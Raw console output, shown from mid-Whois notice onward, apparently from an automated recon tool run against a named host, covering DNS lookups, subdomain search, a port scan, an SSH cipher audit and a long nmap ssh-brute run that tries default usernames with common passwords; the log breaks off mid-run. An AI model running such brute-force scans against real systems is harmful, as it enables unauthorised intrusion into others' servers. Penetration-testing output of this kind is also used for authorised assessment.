- date of the domain name registrant's agreement with the sponsoring
- registrar. Users may consult the sponsoring registrar's Whois database to
- view the registrar's reported date of expiration for this registration.
- TERMS OF USE: You are not authorized to access or query our Whois
- database through the use of electronic processes that are high-volume and
- automated except as reasonably necessary to register domain names or
- modify existing registrations; the Data in VeriSign Global Registry
- Services' ("VeriSign") Whois database is provided by VeriSign for
- information purposes only, and to assist persons in obtaining information
- about or related to a domain name registration record. VeriSign does not
- guarantee its accuracy. By submitting a Whois query, you agree to abide
- by the following terms of use: You agree that you may use this Data only
- for lawful purposes and that under no circumstances will you use this Data
- to: (1) allow, enable, or otherwise support the transmission of mass
- unsolicited, commercial advertising or solicitations via e-mail, telephone,
- or facsimile; or (2) enable high volume, automated, electronic processes
- that apply to VeriSign (or its computer systems). The compilation,
- repackaging, dissemination or other use of this Data is expressly
- prohibited without the prior written consent of VeriSign. You agree not to
- use electronic processes that are automated and high-volume to access or
- query the Whois database except as reasonably necessary to register
- domain names or modify existing registrations. VeriSign reserves the right
- to restrict your access to the Whois database in its sole discretion to ensure
- operational stability. VeriSign may restrict or terminate your access to the
- Whois database for failure to abide by these terms of use. VeriSign
- reserves the right to modify these terms at any time.
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.7 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- [-] Searching in Bing:
- Searching 50 results...
- Searching 100 results...
- [+] Emails found:
- ------------------
- No emails found
- [+] Hosts found in search engines:
- ------------------------------------
- No hosts found
- + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
- ; <<>> DiG 9.10.3-P4-Debian <<>> -x video1.school-models.net
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36420
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;net.school-models.video1.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017043206 1800 900 604800 3600
- ;; Query time: 163 msec
- ;; SERVER: 192.168.1.254#53(192.168.1.254)
- ;; WHEN: Sun Oct 01 20:13:47 EDT 2017
- ;; MSG SIZE rcvd: 134
- Smartmatch is experimental at /usr/bin/dnsenum line 698.
- Smartmatch is experimental at /usr/bin/dnsenum line 698.
- dnsenum VERSION:1.2.4
- ----- video1.school-models.net -----
- Host's addresses:
- __________________
- video1.school-models.net. 280 IN A 45.123.190.187
- Name Servers:
- ______________
- video1.school-models.net NS record query failed: NOERROR
- + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [-] Enumerating subdomains now for video1.school-models.net
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- ╔═╗╦═╗╔╦╗╔═╗╦ ╦
- ║ ╠╦╝ ║ ╚═╗╠═╣
- ╚═╝╩╚═ ╩o╚═╝╩ ╩
- + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
- [+] Domains saved to: /usr/share/sniper/loot/domains/domains-video1.school-models.net-full.txt
- + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
- + -- ----------------------------=[Checking Email Security]=----------------- -- +
- + -- ----------------------------=[Pinging host]=---------------------------- -- +
- PING video1.school-models.net (45.123.190.187) 56(84) bytes of data.
- 64 bytes from 45.123.190.187 (45.123.190.187): icmp_seq=1 ttl=54 time=197 ms
- --- video1.school-models.net ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 197.766/197.766/197.766/0.000 ms
- + -- ----------------------------=[Running TCP port scan]=------------------- -- +
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-01 20:14 EDT
- Warning: 45.123.190.187 giving up on port because retransmission cap hit (2).
- Nmap scan report for video1.school-models.net (45.123.190.187)
- Host is up (0.20s latency).
- Not shown: 391 closed ports, 80 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 22/tcp open ssh
- 80/tcp open http
- Nmap done: 1 IP address (1 host up) scanned in 18.12 seconds
- + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
- + -- --=[Port 21 closed... skipping.
- + -- --=[Port 22 opened... running tests...
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.3
- (gen) software: OpenSSH 5.3
- (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 2.1.0
- (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- # message authentication code algorithms
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 5.3)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -arcfour -- enc algorithm to remove
- (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -arcfour256 -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -arcfour128 -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-01 20:14 EDT
- NSE: [ssh-run] Failed to specify credentials and command to run.
- NSE: [ssh-brute] Trying username/password pair: root:root
- NSE: [ssh-brute] Trying username/password pair: admin:admin
- NSE: [ssh-brute] Trying username/password pair: administrator:administrator
- NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
- NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
- NSE: [ssh-brute] Trying username/password pair: guest:guest
- NSE: [ssh-brute] Trying username/password pair: user:user
- NSE: [ssh-brute] Trying username/password pair: web:web
- NSE: [ssh-brute] Trying username/password pair: test:test
- NSE: [ssh-brute] Trying username/password pair: root:
- NSE: [ssh-brute] Trying username/password pair: admin:
- NSE: [ssh-brute] Trying username/password pair: administrator:
- NSE: [ssh-brute] Trying username/password pair: webadmin:
- NSE: [ssh-brute] Trying username/password pair: sysadmin:
- NSE: [ssh-brute] Trying username/password pair: netadmin:
- NSE: [ssh-brute] Trying username/password pair: guest:
- NSE: [ssh-brute] Trying username/password pair: user:
- NSE: [ssh-brute] Trying username/password pair: web:
- NSE: [ssh-brute] Trying username/password pair: test:
- NSE: [ssh-brute] Trying username/password pair: root:123456
- NSE: [ssh-brute] Trying username/password pair: admin:123456
- NSE: [ssh-brute] Trying username/password pair: administrator:123456
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456
- NSE: [ssh-brute] Trying username/password pair: guest:123456
- NSE: [ssh-brute] Trying username/password pair: user:123456
- NSE: [ssh-brute] Trying username/password pair: web:123456
- NSE: [ssh-brute] Trying username/password pair: test:123456
- NSE: [ssh-brute] Trying username/password pair: root:12345
- NSE: [ssh-brute] Trying username/password pair: admin:12345
- NSE: [ssh-brute] Trying username/password pair: administrator:12345
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345
- NSE: [ssh-brute] Trying username/password pair: guest:12345
- NSE: [ssh-brute] Trying username/password pair: user:12345
- NSE: [ssh-brute] Trying username/password pair: web:12345
- NSE: [ssh-brute] Trying username/password pair: test:12345
- NSE: [ssh-brute] Trying username/password pair: root:123456789
- NSE: [ssh-brute] Trying username/password pair: admin:123456789
- NSE: [ssh-brute] Trying username/password pair: administrator:123456789
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: guest:123456789
- NSE: [ssh-brute] Trying username/password pair: user:123456789
- NSE: [ssh-brute] Trying username/password pair: web:123456789
- NSE: [ssh-brute] Trying username/password pair: test:123456789
- NSE: [ssh-brute] Trying username/password pair: root:password
- NSE: [ssh-brute] Trying username/password pair: admin:password
- NSE: [ssh-brute] Trying username/password pair: administrator:password
- NSE: [ssh-brute] Trying username/password pair: webadmin:password
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password
- NSE: [ssh-brute] Trying username/password pair: netadmin:password
- NSE: [ssh-brute] Trying username/password pair: guest:password
- NSE: [ssh-brute] Trying username/password pair: user:password
- NSE: [ssh-brute] Trying username/password pair: web:password
- NSE: [ssh-brute] Trying username/password pair: test:password
- NSE: [ssh-brute] Trying username/password pair: root:iloveyou
- NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
- NSE: [ssh-brute] Trying username/password pair: user:iloveyou
- NSE: [ssh-brute] Trying username/password pair: web:iloveyou
- NSE: [ssh-brute] Trying username/password pair: test:iloveyou
- NSE: [ssh-brute] Trying username/password pair: root:princess
- NSE: [ssh-brute] Trying username/password pair: admin:princess
- NSE: [ssh-brute] Trying username/password pair: administrator:princess
- NSE: [ssh-brute] Trying username/password pair: webadmin:princess
- NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
- NSE: [ssh-brute] Trying username/password pair: netadmin:princess
- NSE: [ssh-brute] Trying username/password pair: guest:princess
- NSE: [ssh-brute] Trying username/password pair: user:princess
- NSE: [ssh-brute] Trying username/password pair: web:princess
- NSE: [ssh-brute] Trying username/password pair: test:princess
- NSE: [ssh-brute] Trying username/password pair: root:12345678
- NSE: [ssh-brute] Trying username/password pair: admin:12345678
- NSE: [ssh-brute] Trying username/password pair: administrator:12345678
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: guest:12345678
- NSE: [ssh-brute] Trying username/password pair: user:12345678
- NSE: [ssh-brute] Trying username/password pair: web:12345678
- NSE: [ssh-brute] Trying username/password pair: test:12345678
- NSE: [ssh-brute] Trying username/password pair: root:1234567
- NSE: [ssh-brute] Trying username/password pair: admin:1234567
- NSE: [ssh-brute] Trying username/password pair: administrator:1234567
- NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: guest:1234567
- NSE: [ssh-brute] Trying username/password pair: user:1234567
- NSE: [ssh-brute] Trying username/password pair: web:1234567
- NSE: [ssh-brute] Trying username/password pair: test:1234567
- NSE: [ssh-brute] Trying username/password pair: root:abc123
- NSE: [ssh-brute] Trying username/password pair: admin:abc123
- NSE: [ssh-brute] Trying username/password pair: administrator:abc123
- NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: guest:abc123
- NSE: [ssh-brute] Trying username/password pair: user:abc123
- NSE: [ssh-brute] Trying username/password pair: web:abc123
- NSE: [ssh-brute] Trying username/password pair: test:abc123
- NSE: [ssh-brute] Trying username/password pair: root:nicole
- NSE: [ssh-brute] Trying username/password pair: admin:nicole
- NSE: [ssh-brute] Trying username/password pair: administrator:nicole
- NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: guest:nicole
- NSE: [ssh-brute] Trying username/password pair: user:nicole
- NSE: [ssh-brute] Trying username/password pair: web:nicole
- NSE: [ssh-brute] Trying username/password pair: test:nicole
- NSE: [ssh-brute] Trying username/password pair: root:daniel
- NSE: [ssh-brute] Trying username/password pair: admin:daniel
- NSE: [ssh-brute] Trying username/password pair: administrator:daniel
- NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: guest:daniel
- NSE: [ssh-brute] Trying username/password pair: user:daniel
- NSE: [ssh-brute] Trying username/password pair: web:daniel
- NSE: [ssh-brute] Trying username/password pair: test:daniel
- NSE: [ssh-brute] Trying username/password pair: root:monkey
- NSE: [ssh-brute] Trying username/password pair: admin:monkey
- NSE: [ssh-brute] Trying username/password pair: administrator:monkey
- NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: guest:monkey
- NSE: [ssh-brute] Trying username/password pair: user:monkey
- NSE: [ssh-brute] Trying username/password pair: web:monkey
- NSE: [ssh-brute] Trying username/password pair: test:monkey
- NSE: [ssh-brute] Trying username/password pair: root:babygirl
- NSE: [ssh-brute] Trying username/password pair: admin:babygirl
- NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
- NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: guest:babygirl
- NSE: [ssh-brute] Trying username/password pair: user:babygirl
- NSE: [ssh-brute] Trying username/password pair: web:babygirl
- NSE: [ssh-brute] Trying username/password pair: test:babygirl
- NSE: [ssh-brute] Trying username/password pair: root:qwerty
- NSE: [ssh-brute] Trying username/password pair: admin:qwerty
- NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
- NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: guest:qwerty
- NSE: [ssh-brute] Trying username/password pair: user:qwerty
- NSE: [ssh-brute] Trying username/password pair: web:qwerty
- NSE: [ssh-brute] Trying username/password pair: test:qwerty
- NSE: [ssh-brute] Trying username/password pair: root:lovely
- NSE: [ssh-brute] Trying username/password pair: admin:lovely
- NSE: [ssh-brute] Trying username/password pair: administrator:lovely
- NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: guest:lovely
- NSE: [ssh-brute] Trying username/password pair: user:lovely
- NSE: [ssh-brute] Trying username/password pair: web:lovely
- NSE: [ssh-brute] Trying username/password pair: test:lovely
- NSE: [ssh-brute] Trying username/password pair: root:654321
- NSE: [ssh-brute] Trying username/password pair: admin:654321
- NSE: [ssh-brute] Trying username/password pair: administrator:654321
- NSE: [ssh-brute] Trying username/password pair: webadmin:654321
- NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
- NSE: [ssh-brute] Trying username/password pair: netadmin:654321
- NSE: [ssh-brute] Trying username/password pair: guest:654321
- NSE: [ssh-brute] Trying username/password pair: user:654321
- NSE: [ssh-brute] Trying username/password pair: web:654321
- NSE: [ssh-brute] Trying username/password pair: test:654321
- NSE: [ssh-brute] Trying username/password pair: root:michael
- NSE: [ssh-brute] Trying username/password pair: admin:michael
- NSE: [ssh-brute] Trying username/password pair: administrator:michael
- NSE: [ssh-brute] Trying username/password pair: webadmin:michael
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
- NSE: [ssh-brute] Trying username/password pair: netadmin:michael
- NSE: [ssh-brute] Trying username/password pair: guest:michael
- NSE: [ssh-brute] Trying username/password pair: user:michael
- NSE: [ssh-brute] Trying username/password pair: web:michael
- NSE: [ssh-brute] Trying username/password pair: test:michael
- NSE: [ssh-brute] Trying username/password pair: root:jessica
- NSE: [ssh-brute] Trying username/password pair: admin:jessica
- NSE: [ssh-brute] Trying username/password pair: administrator:jessica
- NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: guest:jessica
- NSE: [ssh-brute] Trying username/password pair: user:jessica
- NSE: [ssh-brute] Trying username/password pair: web:jessica
- NSE: [ssh-brute] Trying username/password pair: test:jessica
- NSE: [ssh-brute] Trying username/password pair: root:111111
- NSE: [ssh-brute] Trying username/password pair: admin:111111
- NSE: [ssh-brute] Trying username/password pair: administrator:111111
- NSE: [ssh-brute] Trying username/password pair: webadmin:111111
- NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
- NSE: [ssh-brute] Trying username/password pair: netadmin:111111
- NSE: [ssh-brute] Trying username/password pair: guest:111111
- NSE: [ssh-brute] Trying username/password pair: user:111111
- NSE: [ssh-brute] Trying username/password pair: web:111111
- NSE: [ssh-brute] Trying username/password pair: test:111111
- NSE: [ssh-brute] Trying username/password pair: root:ashley
- NSE: [ssh-brute] Trying username/password pair: admin:ashley
- NSE: [ssh-brute] Trying username/password pair: administrator:ashley
- NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: guest:ashley
- NSE: [ssh-brute] Trying username/password pair: user:ashley
- NSE: [ssh-brute] Trying username/password pair: web:ashley
- NSE: [ssh-brute] Trying username/password pair: test:ashley
- NSE: [ssh-brute] Trying username/password pair: root:000000
- NSE: [ssh-brute] Trying username/password pair: admin:000000
- NSE: [ssh-brute] Trying username/password pair: administrator:000000
- NSE: [ssh-brute] Trying username/password pair: webadmin:000000
- NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
- NSE: [ssh-brute] Trying username/password pair: netadmin:000000
- NSE: [ssh-brute] Trying username/password pair: guest:000000
- NSE: [ssh-brute] Trying username/password pair: user:000000
- NSE: [ssh-brute] Trying username/password pair: web:000000
- NSE: [ssh-brute] Trying username/password pair: test:000000
- NSE: [ssh-brute] Trying username/password pair: root:iloveu
- NSE: [ssh-brute] Trying username/password pair: admin:iloveu
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: guest:iloveu
- NSE: [ssh-brute] Trying username/password pair: user:iloveu
- NSE: [ssh-brute] Trying username/password pair: web:iloveu
- NSE: [ssh-brute] Trying username/password pair: test:iloveu
- NSE: [ssh-brute] Trying username/password pair: root:michelle
- NSE: [ssh-brute] Trying username/password pair: admin:michelle
- NSE: [ssh-brute] Trying username/password pair: administrator:michelle
- NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: guest:michelle
- NSE: [ssh-brute] Trying username/password pair: user:michelle
- NSE: [ssh-brute] Trying username/password pair: web:michelle
- NSE: [ssh-brute] Trying username/password pair: test:michelle
- NSE: [ssh-brute] Trying username/password pair: root:tigger
- NSE: [ssh-brute] Trying username/password pair: admin:tigger
- NSE: [ssh-brute] Trying username/password pair: administrator:tigger
- NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: guest:tigger
- NSE: [ssh-brute] Trying username/password pair: user:tigger
- NSE: [ssh-brute] Trying username/password pair: web:tigger
- NSE: [ssh-brute] Trying username/password pair: test:tigger
- NSE: [ssh-brute] Trying username/password pair: root:sunshine
- NSE: [ssh-brute] Trying username/password pair: admin:sunshine
- NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
- NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: guest:sunshine
- NSE: [ssh-brute] Trying username/password pair: user:sunshine
- NSE: [ssh-brute] Trying username/password pair: web:sunshine
- NSE: [ssh-brute] Trying username/password pair: test:sunshine
- NSE: [ssh-brute] Trying username/password pair: root:chocolate
- NSE: [ssh-brute] Trying username/password pair: admin:chocolate
- NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
- NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: guest:chocolate
- NSE: [ssh-brute] Trying username/password pair: user:chocolate
- NSE: [ssh-brute] Trying username/password pair: web:chocolate
- NSE: [ssh-brute] Trying username/password pair: test:chocolate
- NSE: [ssh-brute] Trying username/password pair: root:password1
- NSE: [ssh-brute] Trying username/password pair: admin:password1
- NSE: [ssh-brute] Trying username/password pair: administrator:password1
- NSE: [ssh-brute] Trying username/password pair: webadmin:password1
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
- NSE: [ssh-brute] Trying username/password pair: netadmin:password1
- NSE: [ssh-brute] Trying username/password pair: guest:password1
- NSE: [ssh-brute] Trying username/password pair: user:password1
- NSE: [ssh-brute] Trying username/password pair: web:password1
- NSE: [ssh-brute] Trying username/password pair: test:password1
- NSE: [ssh-brute] Trying username/password pair: root:soccer
- NSE: [ssh-brute] Trying username/password pair: admin:soccer
